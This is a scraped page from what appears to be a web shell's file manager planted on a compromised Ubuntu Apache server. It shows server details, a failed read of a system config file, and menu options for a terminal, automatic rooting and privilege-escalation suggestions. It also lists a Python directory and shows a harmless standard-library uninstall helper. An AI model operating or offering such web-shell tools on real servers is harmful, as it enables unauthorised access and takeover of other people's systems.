Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python2.7 /
ensurepip /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.py
8.93
KB
-rwxr-xr-x
2021-03-01 21:41
__init__.pyc
7.61
KB
-rw-r--r--
2021-03-05 07:58
__main__.py
67
B
-rw-r--r--
2021-03-01 21:41
__main__.pyc
223
B
-rw-r--r--
2021-03-05 07:58
_uninstall.py
780
B
-rw-r--r--
2021-03-01 21:41
_uninstall.pyc
1.06
KB
-rw-r--r--
2021-03-05 07:58
Save
Rename
"""Basic pip uninstallation support, helper for the Windows uninstaller""" import argparse import ensurepip def _main(argv=None): parser = argparse.ArgumentParser(prog="python -m ensurepip._uninstall") parser.add_argument( "--version", action="version", version="pip {}".format(ensurepip.version()), help="Show the version of pip this will attempt to uninstall.", ) parser.add_argument( "-v", "--verbose", action="count", default=0, dest="verbosity", help=("Give more output. Option is additive, and can be used up to 3 " "times."), ) args = parser.parse_args(argv) ensurepip._uninstall_helper(verbosity=args.verbosity) if __name__ == "__main__": _main()